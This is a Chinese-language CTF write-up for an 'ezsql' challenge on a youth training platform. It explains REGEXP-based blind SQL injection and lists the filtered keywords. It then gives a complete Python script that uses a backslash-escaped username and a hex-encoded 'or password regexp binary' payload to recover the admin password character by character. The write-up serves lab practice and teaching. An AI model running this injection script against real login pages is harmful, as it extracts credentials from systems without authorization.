CTF每日练习之"ezsql"
青少年CTF训练平台
传送门:青少年CTF训练平台
regexp注入
提示:regexp盲注
文章传送:REGEXP注入与LIKE注入学习笔记
REGEXP注入,即regexp正则表达式注入。REGEXP注入,又叫盲注值正则表达式攻击。
应用场景就是盲注,原理是直接查询自己需要的数据,然后通过正则表达式进行匹配。
正则表达式:
用来检查一个字符串是否含有某个子字符串,将匹配的子字符串做替换或者从某个字符串中取出符合某个条件的子串等,前端往往有大量的表单数据校验工作,采用正则表达式会使得数据校验的工作量大大减轻。常用效果:邮箱、手机号、身份证号等
漏洞复现
提示:regexp盲注
通过尝试发现过滤了select、union、'、"、、=、like、and等
利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写
import requests
import string
def str2hex(string):
result = ''
for i in string:
result += hex(ord(i))
result = result.replace('0x', '')
return '0x' + result
strs = string.ascii_letters + string.digits
url = "http://b860d0fe-b343-4945-85e3-8dda6ca2ae83.challenge.qsnctf.com:8081/login.php"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'
}
payload = 'or password regexp binary {}#'
if __name__ == "__main__":
name = ''
for i in range(1, 40):
for j in strs:
passwd = str2hex('^' + name + j)
payloads = payload.format(passwd)
postdata = {
'username': 'admin\\',
'password': payloads
}
r = requests.post(url, data=postdata, headers=headers)
if "Maybe you are right" in r.text:
name += j
print(j, end='')
break
破解密码
拿到flag